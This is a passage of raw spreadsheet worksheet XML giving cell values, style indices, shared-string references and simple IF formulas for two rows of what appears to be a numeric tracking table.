      <c r="FC17" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FD17" s="111">
        <v>0.0</v>
      </c>
      <c r="FE17" s="111">
        <v>0.0</v>
      </c>
      <c r="FF17" s="101" t="s">
        <v>12</v>
      </c>
      <c r="FG17" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FH17" s="111">
        <v>0.0</v>
      </c>
      <c r="FI17" s="111">
        <v>0.0</v>
      </c>
      <c r="FJ17" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FK17" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FL17" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FM17" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN17" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FO17" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP17" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ17" s="111">
        <v>0.0</v>
      </c>
      <c r="FR17" s="111">
        <v>0.0</v>
      </c>
      <c r="FS17" s="112">
        <v>0.0</v>
      </c>
      <c r="FT17" s="112">
        <v>0.0</v>
      </c>
      <c r="FU17" s="112">
        <v>0.0</v>
      </c>
      <c r="FV17" s="112">
        <v>0.0</v>
      </c>
      <c r="FW17" s="112">
        <v>0.0</v>
      </c>
      <c r="FX17" s="112">
        <v>0.0</v>
      </c>
      <c r="FY17" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ17" s="112">
        <v>0.0</v>
      </c>
      <c r="GA17" s="112">
        <v>0.0</v>
      </c>
      <c r="GB17" s="112">
        <v>0.0</v>
      </c>
      <c r="GC17" s="112">
        <v>0.0</v>
      </c>
      <c r="GD17" s="112">
        <v>0.0</v>
      </c>
      <c r="GE17" s="112">
        <v>0.0</v>
      </c>
      <c r="GF17" s="112">
        <v>0.0</v>
      </c>
      <c r="GG17" s="112">
        <v>0.0</v>
      </c>
      <c r="GH17" s="113">
        <f t="shared" si="39"/>
        <v>0</v>
      </c>
      <c r="GI17" s="113">
        <f t="shared" si="40"/>
        <v>0</v>
      </c>
      <c r="GJ17" s="113">
        <f t="shared" si="41"/>
        <v>0</v>
      </c>
      <c r="GK17" s="113">
        <f t="shared" si="42"/>
        <v>0</v>
      </c>
      <c r="GL17" s="113">
        <f t="shared" si="43"/>
        <v>0</v>
      </c>
      <c r="GM17" s="113">
        <f t="shared" si="44"/>
        <v>0</v>
      </c>
      <c r="GN17" s="113">
        <f t="shared" si="45"/>
        <v>0</v>
      </c>
      <c r="GO17" s="113">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="GP17" s="113">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="GQ17" s="114">
        <f t="shared" si="48"/>
        <v>0</v>
      </c>
      <c r="GR17" s="113">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="GS17" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT17" s="94"/>
      <c r="GU17" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV17" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW17" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX17" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY17" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ17" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA17" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB17" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC17" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD17" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE17" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF17" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG17" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH17" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI17" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ17" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK17" s="93" t="str">
        <f t="shared" si="51"/>
        <v>NO</v>
      </c>
      <c r="HL17" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HM17" s="93">
        <f t="shared" si="52"/>
        <v>0</v>
      </c>
      <c r="HN17" s="93">
        <v>0.0</v>
      </c>
      <c r="HO17" s="93">
        <v>0.0</v>
      </c>
      <c r="HP17" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ17" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR17" s="118">
        <f t="shared" si="54"/>
        <v>0</v>
      </c>
      <c r="HS17" s="118">
        <f t="shared" si="55"/>
        <v>0</v>
      </c>
      <c r="HT17" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU17" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV17" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HW17" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HX17" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HY17" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ17" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA17" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB17" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC17" s="120" t="str">
        <f t="shared" si="65"/>
        <v>-</v>
      </c>
      <c r="ID17" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE17" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF17" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG17" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH17" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II17" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ17" s="98" t="str">
        <f t="shared" si="56"/>
        <v>NO</v>
      </c>
      <c r="IK17" s="99">
        <v>0.0</v>
      </c>
      <c r="IL17" s="99">
        <v>0.0</v>
      </c>
      <c r="IM17" s="121">
        <f t="shared" si="57"/>
        <v>0</v>
      </c>
      <c r="IN17" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO17" s="98">
        <v>0.0</v>
      </c>
      <c r="IP17" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ17" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR17" s="118">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="IS17" s="124" t="s">
        <v>225</v>
      </c>
      <c r="IT17" s="127"/>
      <c r="IU17" s="127"/>
      <c r="IV17" s="127"/>
      <c r="IW17" s="127"/>
      <c r="IX17" s="127"/>
      <c r="IY17" s="127"/>
      <c r="IZ17" s="127"/>
      <c r="JA17" s="127"/>
      <c r="JB17" s="127"/>
      <c r="JC17" s="127"/>
      <c r="JD17" s="127"/>
      <c r="JE17" s="127"/>
      <c r="JF17" s="127"/>
      <c r="JG17" s="127"/>
      <c r="JH17" s="127"/>
      <c r="JI17" s="127"/>
      <c r="JJ17" s="127"/>
      <c r="JK17" s="127"/>
      <c r="JL17" s="127"/>
      <c r="JM17" s="127"/>
      <c r="JN17" s="127"/>
      <c r="JO17" s="127"/>
      <c r="JP17" s="127"/>
      <c r="JQ17" s="127"/>
      <c r="JR17" s="127"/>
      <c r="JS17" s="127"/>
      <c r="JT17" s="127"/>
      <c r="JU17" s="127"/>
      <c r="JV17" s="127"/>
      <c r="JW17" s="127"/>
      <c r="JX17" s="127"/>
      <c r="JY17" s="127"/>
      <c r="JZ17" s="127"/>
      <c r="KA17" s="127"/>
      <c r="KB17" s="127"/>
      <c r="KC17" s="127"/>
      <c r="KD17" s="127"/>
      <c r="KE17" s="127"/>
      <c r="KF17" s="127"/>
      <c r="KG17" s="127"/>
      <c r="KH17" s="127"/>
      <c r="KI17" s="127"/>
      <c r="KJ17" s="127"/>
      <c r="KK17" s="127"/>
      <c r="KL17" s="127"/>
      <c r="KM17" s="127"/>
      <c r="KN17" s="127"/>
      <c r="KO17" s="127"/>
      <c r="KP17" s="127"/>
      <c r="KQ17" s="127"/>
      <c r="KR17" s="127"/>
      <c r="KS17" s="127"/>
      <c r="KT17" s="127"/>
      <c r="KU17" s="127"/>
      <c r="KV17" s="127"/>
      <c r="KW17" s="127"/>
      <c r="KX17" s="127"/>
      <c r="KY17" s="127"/>
      <c r="KZ17" s="127"/>
      <c r="LA17" s="127"/>
      <c r="LB17" s="127"/>
      <c r="LC17" s="127"/>
      <c r="LD17" s="127"/>
      <c r="LE17" s="127"/>
      <c r="LF17" s="127"/>
      <c r="LG17" s="127"/>
      <c r="LH17" s="127"/>
      <c r="LI17" s="127"/>
      <c r="LJ17" s="127"/>
      <c r="LK17" s="127"/>
      <c r="LL17" s="127"/>
      <c r="LM17" s="127"/>
      <c r="LN17" s="127"/>
      <c r="LO17" s="127"/>
      <c r="LP17" s="127"/>
      <c r="LQ17" s="127"/>
      <c r="LR17" s="127"/>
      <c r="LS17" s="127"/>
      <c r="LT17" s="127"/>
      <c r="LU17" s="127"/>
      <c r="LV17" s="127"/>
      <c r="LW17" s="127"/>
      <c r="LX17" s="127"/>
      <c r="LY17" s="127"/>
      <c r="LZ17" s="127"/>
      <c r="MA17" s="127"/>
      <c r="MB17" s="127"/>
      <c r="MC17" s="127"/>
      <c r="MD17" s="127"/>
      <c r="ME17" s="127"/>
      <c r="MF17" s="127"/>
      <c r="MG17" s="127"/>
      <c r="MH17" s="127"/>
      <c r="MI17" s="127"/>
      <c r="MJ17" s="127"/>
      <c r="MK17" s="127"/>
      <c r="ML17" s="127"/>
      <c r="MM17" s="127"/>
      <c r="MN17" s="127"/>
      <c r="MO17" s="127"/>
      <c r="MP17" s="127"/>
      <c r="MQ17" s="127"/>
      <c r="MR17" s="127"/>
      <c r="MS17" s="127"/>
      <c r="MT17" s="127"/>
      <c r="MU17" s="127"/>
      <c r="MV17" s="127"/>
      <c r="MW17" s="127"/>
      <c r="MX17" s="127"/>
      <c r="MY17" s="127"/>
      <c r="MZ17" s="127"/>
      <c r="NA17" s="127"/>
      <c r="NB17" s="127"/>
      <c r="NC17" s="127"/>
      <c r="ND17" s="127"/>
      <c r="NE17" s="127"/>
      <c r="NF17" s="127"/>
      <c r="NG17" s="127"/>
      <c r="NH17" s="127"/>
      <c r="NI17" s="127"/>
      <c r="NJ17" s="127"/>
      <c r="NK17" s="127"/>
      <c r="NL17" s="127"/>
      <c r="NM17" s="127"/>
      <c r="NN17" s="127"/>
      <c r="NO17" s="127"/>
      <c r="NP17" s="127"/>
      <c r="NQ17" s="127"/>
      <c r="NR17" s="127"/>
      <c r="NS17" s="127"/>
      <c r="NT17" s="127"/>
      <c r="NU17" s="127"/>
      <c r="NV17" s="127"/>
      <c r="NW17" s="127"/>
      <c r="NX17" s="127"/>
      <c r="NY17" s="127"/>
    </row>
    <row r="18" ht="196.5" customHeight="1">
      <c r="B18" s="89" t="s">
        <v>244</v>
      </c>
      <c r="C18" s="90" t="s">
        <v>310</v>
      </c>
      <c r="D18" s="90" t="s">
        <v>245</v>
      </c>
      <c r="E18" s="90" t="s">
        <v>445</v>
      </c>
      <c r="F18" s="90" t="s">
        <v>446</v>
      </c>
      <c r="G18" s="90" t="s">
        <v>12</v>
      </c>
      <c r="H18" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I18" s="92" t="s">
        <v>472</v>
      </c>
      <c r="J18" s="92" t="s">
        <v>448</v>
      </c>
      <c r="K18" s="92" t="s">
        <v>473</v>
      </c>
      <c r="L18" s="93" t="s">
        <v>474</v>
      </c>
      <c r="M18" s="93">
        <v>10674.0</v>
      </c>
      <c r="N18" s="93">
        <v>10674.0</v>
      </c>
      <c r="O18" s="93">
        <v>0.0</v>
      </c>
      <c r="P18" s="93">
        <v>10683.0</v>
      </c>
      <c r="Q18" s="93">
        <v>10683.0</v>
      </c>
      <c r="R18" s="93">
        <v>10683.0</v>
      </c>
      <c r="S18" s="93">
        <v>0.0</v>
      </c>
      <c r="T18" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U18" s="95" t="s">
        <v>475</v>
      </c>
      <c r="V18" s="96" t="s">
        <v>476</v>
      </c>
      <c r="W18" s="96" t="s">
        <v>12</v>
      </c>
      <c r="X18" s="97" t="s">
        <v>477</v>
      </c>
      <c r="Y18" s="96" t="s">
        <v>478</v>
      </c>
      <c r="Z18" s="96" t="s">
        <v>479</v>
      </c>
      <c r="AA18" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB18" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC18" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD18" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE18" s="95" t="s">
        <v>456</v>
      </c>
      <c r="AF18" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG18" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH18" s="99" t="s">
        <v>480</v>
      </c>
      <c r="AI18" s="99" t="s">
        <v>481</v>
      </c>
      <c r="AJ18" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK18" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL18" s="100">
        <v>0.0</v>
      </c>
      <c r="AM18" s="100">
        <v>0.0</v>
      </c>
      <c r="AN18" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO18" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP18" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ18" s="100">
        <v>0.0</v>
      </c>
      <c r="AR18" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS18" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT18" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AU18" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV18" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW18" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX18" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY18" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ18" s="100">
        <v>0.0</v>
      </c>
      <c r="BA18" s="102">
        <v>10674.0</v>
      </c>
      <c r="BB18" s="102">
        <v>0.0</v>
      </c>
      <c r="BC18" s="102">
        <v>0.0</v>
      </c>
      <c r="BD18" s="102">
        <v>0.0</v>
      </c>
      <c r="BE18" s="102">
        <v>0.0</v>
      </c>
      <c r="BF18" s="102">
        <v>0.0</v>
      </c>
      <c r="BG18" s="102">
        <v>0.0</v>
      </c>
      <c r="BH18" s="102">
        <v>0.0</v>
      </c>
      <c r="BI18" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ18" s="102">
        <v>0.0</v>
      </c>
      <c r="BK18" s="102">
        <v>0.0</v>
      </c>
      <c r="BL18" s="103">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BM18" s="103">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="BN18" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO18" s="103">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="BP18" s="103">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="BQ18" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR18" s="103">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="BS18" s="103">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="BT18" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU18" s="103">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="BV18" s="103">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="BW18" s="104">
        <v>2013028.0</v>
      </c>
      <c r="BX18" s="104">
        <v>1.0</v>
      </c>
      <c r="BY18" s="104">
        <v>1.0</v>
      </c>
      <c r="BZ18" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA18" s="104">
        <v>2013028.0</v>
      </c>
      <c r="CB18" s="104">
        <v>1.0</v>
      </c>
      <c r="CC18" s="104">
        <v>1.0</v>
      </c>
      <c r="CD18" s="104">
        <v>2013028.0</v>
      </c>
      <c r="CE18" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF18" s="104">
        <f t="shared" si="67"/>
        <v>2013028</v>
      </c>
      <c r="CG18" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH18" s="104">
        <v>2013028.0</v>
      </c>
      <c r="CI18" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ18" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK18" s="104">
        <v>0.0</v>
      </c>
      <c r="CL18" s="104">
        <v>0.0</v>
      </c>
      <c r="CM18" s="105">
        <v>1.0</v>
      </c>
      <c r="CN18" s="105">
        <v>1.0</v>
      </c>
      <c r="CO18" s="105">
        <v>1.0</v>
      </c>
      <c r="CP18" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ18" s="105">
        <v>1.0</v>
      </c>
      <c r="CR18" s="105">
        <v>1.0</v>
      </c>
      <c r="CS18" s="105">
        <v>0.0</v>
      </c>
      <c r="CT18" s="105">
        <v>0.0</v>
      </c>
      <c r="CU18" s="105">
        <v>0.0</v>
      </c>
      <c r="CV18" s="105">
        <v>0.0</v>
      </c>
      <c r="CW18" s="105">
        <v>1.0</v>
      </c>
      <c r="CX18" s="105">
        <v>1.0</v>
      </c>
      <c r="CY18" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ18" s="105">
        <v>1.0</v>
      </c>
      <c r="DA18" s="105">
        <v>1.0</v>
      </c>
      <c r="DB18" s="106">
        <f t="shared" si="15"/>
        <v>0.00009368559116</v>
      </c>
      <c r="DC18" s="106">
        <f t="shared" si="16"/>
        <v>0.00009368559116</v>
      </c>
      <c r="DD18" s="106">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="DE18" s="106">
        <f t="shared" si="18"/>
        <v>0.00009360666479</v>
      </c>
      <c r="DF18" s="106">
        <f t="shared" si="19"/>
        <v>0.00009360666479</v>
      </c>
      <c r="DG18" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH18" s="106">
        <f t="shared" si="21"/>
        <v>0.00009360666479</v>
      </c>
      <c r="DI18" s="106">
        <f t="shared" si="22"/>
        <v>0.00009360666479</v>
      </c>
      <c r="DJ18" s="106">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="DK18" s="107">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>
      <c r="DL18" s="106">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
      <c r="DM18" s="108" t="s">
        <v>482</v>
      </c>
      <c r="DN18" s="108">
        <v>2.0</v>
      </c>
      <c r="DO18" s="108">
        <v>2.0</v>
      </c>
      <c r="DP18" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ18" s="108" t="s">
        <v>482</v>
      </c>
      <c r="DR18" s="108">
        <v>2.0</v>
      </c>
      <c r="DS18" s="108">
        <v>2.0</v>
      </c>
      <c r="DT18" s="108" t="s">
        <v>482</v>
      </c>
      <c r="DU18" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV18" s="108" t="str">
        <f t="shared" ref="DV18:DV21" si="68">IF(DT18="-",DU18,DT18)</f>
        <v>2013028, 50447</v>
      </c>
      <c r="DW18" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX18" s="108" t="s">
        <v>482</v>
      </c>
      <c r="DY18" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ18" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA18" s="108">
        <v>0.0</v>
      </c>
      <c r="EB18" s="108">
        <v>0.0</v>
      </c>
      <c r="EC18" s="109">
        <v>10674.0</v>
      </c>
      <c r="ED18" s="109">
        <v>1.0</v>
      </c>
      <c r="EE18" s="109">
        <v>2.0</v>
      </c>
      <c r="EF18" s="109">
        <v>1.0</v>
      </c>
      <c r="EG18" s="109">
        <v>1.0</v>
      </c>
      <c r="EH18" s="109">
        <v>2.0</v>
      </c>
      <c r="EI18" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ18" s="109">
        <v>0.0</v>
      </c>
      <c r="EK18" s="109">
        <v>0.0</v>
      </c>
      <c r="EL18" s="109">
        <v>0.0</v>
      </c>
      <c r="EM18" s="109">
        <v>1.0</v>
      </c>
      <c r="EN18" s="109">
        <v>2.0</v>
      </c>
      <c r="EO18" s="109">
        <v>1.0</v>
      </c>
      <c r="EP18" s="109">
        <v>1.0</v>
      </c>
      <c r="EQ18" s="109">
        <v>2.0</v>
      </c>
      <c r="ER18" s="110">
        <f t="shared" si="27"/>
        <v>0.00009368559116</v>
      </c>
      <c r="ES18" s="110">
        <f t="shared" si="28"/>
        <v>0.00009368559116</v>
      </c>
      <c r="ET18" s="110">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="EU18" s="110">
        <f t="shared" si="30"/>
        <v>0.0001872133296</v>
      </c>
      <c r="EV18" s="110">
        <f t="shared" si="31"/>
        <v>0.0001872133296</v>
      </c>
      <c r="EW18" s="110">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="EX18" s="110">
        <f t="shared" si="33"/>
        <v>0.0001872133296</v>
      </c>
      <c r="EY18" s="110">
        <f t="shared" si="34"/>
        <v>0.0001872133296</v>
      </c>
      <c r="EZ18" s="110">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="FA18" s="110">
        <f t="shared" si="36"/>
        <v>0</v>
      </c>
      <c r="FB18" s="110">
        <f t="shared" si="37"/>
        <v>0</v>
      </c>
      <c r="FC18" s="111" t="s">
        <v>483</v>
      </c>
      <c r="FD18" s="111">
        <v>6.0</v>
      </c>
      <c r="FE18" s="111">
        <v>10822.0</v>
      </c>
      <c r="FF18" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG18" s="111" t="s">
        <v>484</v>
      </c>
      <c r="FH18" s="111">
        <v>4.0</v>
      </c>
      <c r="FI18" s="111">
        <v>99.0</v>
      </c>
      <c r="FJ18" s="111" t="s">
        <v>484</v>
      </c>
      <c r="FK18" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FL18" s="111" t="str">
        <f t="shared" ref="FL18:FL45" si="69">IF(FJ18="-",FK18,FJ18)</f>
        <v>50447, 2100528, 2013028, 2002824</v>
      </c>
      <c r="FM18" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN18" s="111" t="s">
        <v>484</v>
      </c>
      <c r="FO18" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP18" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ18" s="111">
        <v>0.0</v>
      </c>
      <c r="FR18" s="111">
        <v>0.0</v>
      </c>
      <c r="FS18" s="112">
        <v>1.0</v>
      </c>
      <c r="FT18" s="112">
        <v>10674.0</v>
      </c>
      <c r="FU18" s="112">
        <v>9823.0</v>
      </c>
      <c r="FV18" s="112">
        <v>1.0</v>
      </c>
      <c r="FW18" s="112">
        <v>10821.0</v>
      </c>
      <c r="FX18" s="112">
        <v>10822.0</v>
      </c>
      <c r="FY18" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ18" s="112">
        <v>0.0</v>
      </c>
      <c r="GA18" s="112">
        <v>0.0</v>
      </c>
      <c r="GB18" s="112">
        <v>0.0</v>
      </c>
      <c r="GC18" s="112">
        <v>97.0</v>
      </c>
      <c r="GD18" s="112">
        <v>98.0</v>
      </c>
      <c r="GE18" s="112">
        <v>1.0</v>
      </c>
      <c r="GF18" s="112">
        <v>98.0</v>
      </c>
      <c r="GG18" s="112">
        <v>99.0</v>
      </c>
      <c r="GH18" s="113">
        <f t="shared" si="39"/>
        <v>1</v>
      </c>
      <c r="GI18" s="113">
        <f t="shared" si="40"/>
        <v>0.009087502342</v>
      </c>
      <c r="GJ18" s="113">
        <f t="shared" si="41"/>
        <v>0</v>
      </c>
      <c r="GK18" s="113">
        <f t="shared" si="42"/>
        <v>0.9194982683</v>
      </c>
      <c r="GL18" s="113">
        <f t="shared" si="43"/>
        <v>0.00917345315</v>
      </c>
      <c r="GM18" s="113">
        <f t="shared" si="44"/>
        <v>0</v>
      </c>
      <c r="GN18" s="113">
        <f t="shared" si="45"/>
        <v>1.013011326</v>
      </c>
      <c r="GO18" s="113">
        <f t="shared" si="46"/>
        <v>0.009267059815</v>
      </c>
      <c r="GP18" s="113">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="GQ18" s="114">
        <f t="shared" si="48"/>
        <v>0</v>
      </c>
      <c r="GR18" s="113">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="GS18" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT18" s="94" t="s">
        <v>485</v>
      </c>
      <c r="GU18" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV18" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW18" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX18" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY18" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ18" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA18" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB18" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC18" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD18" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE18" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF18" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG18" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH18" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI18" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ18" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK18" s="93" t="str">
        <f t="shared" si="51"/>
        <v>NO</v>
      </c>
      <c r="HL18" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HM18" s="93">
        <f t="shared" si="52"/>
        <v>0</v>
      </c>
      <c r="HN18" s="93">
        <v>0.0</v>
      </c>
      <c r="HO18" s="93">
        <v>0.0</v>
      </c>
      <c r="HP18" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ18" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR18" s="118">
        <f t="shared" si="54"/>
        <v>0</v>
      </c>
      <c r="HS18" s="118">
        <f t="shared" si="55"/>
        <v>0</v>
      </c>
      <c r="HT18" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU18" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV18" s="119">
        <v>9999.0</v>
      </c>
      <c r="HW18" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HX18" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HY18" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ18" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA18" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB18" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC18" s="120" t="s">
        <v>12</v>
      </c>
      <c r="ID18" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE18" s="120">
        <v>9999.0</v>
      </c>
      <c r="IF18" s="120">
        <v>9999.0</v>
      </c>
      <c r="IG18" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH18" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II18" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ18" s="98" t="str">
        <f t="shared" si="56"/>
        <v>NO</v>
      </c>
      <c r="IK18" s="99">
        <v>0.0</v>
      </c>
      <c r="IL18" s="99">
        <v>0.0</v>
      </c>
      <c r="IM18" s="121">
        <f t="shared" si="57"/>
        <v>0</v>
      </c>
      <c r="IN18" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO18" s="98">
        <v>0.0</v>
      </c>
      <c r="IP18" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ18" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR18" s="118">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="IS18" s="124" t="s">
        <v>225</v>
      </c>
      <c r="IT18" s="127"/>
      <c r="IU18" s="127"/>
      <c r="IV18" s="127"/>
      <c r="IW18" s="127"/>
      <c r="IX18" s="127"/>
      <c r="IY18" s="127"/>
      <c r="IZ18" s="127"/>
      <c r="JA18" s="127"/>
      <c r="JB18" s="127"/>
      <c r="JC18" s="127"/>
      <c r="JD18" s="127"/>
      <c r="JE18" s="127"/>
      <c r="JF18" s="127"/>
      <c r="JG18" s="127"/>
      <c r="JH18" s="127"/>
      <c r="JI18" s="127"/>
      <c r="JJ18" s="127"/>
      <c r="JK18" s="127"/>
      <c r="JL18" s="127"/>
      <c r="JM18" s="127"/>
      <c r="JN18" s="127"/>
      <c r="JO18" s="127"/>
      <c r="JP18" s="127"/>
      <c r="JQ18" s="127"/>
      <c r="JR18" s="127"/>
      <c r="JS18" s="127"/>
      <c r="JT18" s="127"/>
      <c r="JU18" s="127"/>
      <c r="JV18" s="127"/>
      <c r="JW18" s="127"/>
      <c r="JX18" s="127"/>
      <c r="JY18" s="127"/>
      <c r="JZ18" s="127"/>
      <c r="KA18" s="127"/>
      <c r="KB18" s="127"/>
      <c r="KC18" s="127"/>
      <c r="KD18" s="127"/>
      <c r="KE18" s="127"/>
      <c r="KF18" s="127"/>
      <c r="KG18" s="127"/>
      <c r="KH18" s="127"/>
      <c r="KI18" s="127"/>
      <c r="KJ18" s="127"/>
      <c r="KK18" s="127"/>
      <c r="KL18" s="127"/>
      <c r="KM18" s="127"/>
      <c r="KN18" s="127"/>
      <c r="KO18" s="127"/>
      <c r="KP18" s="127"/>
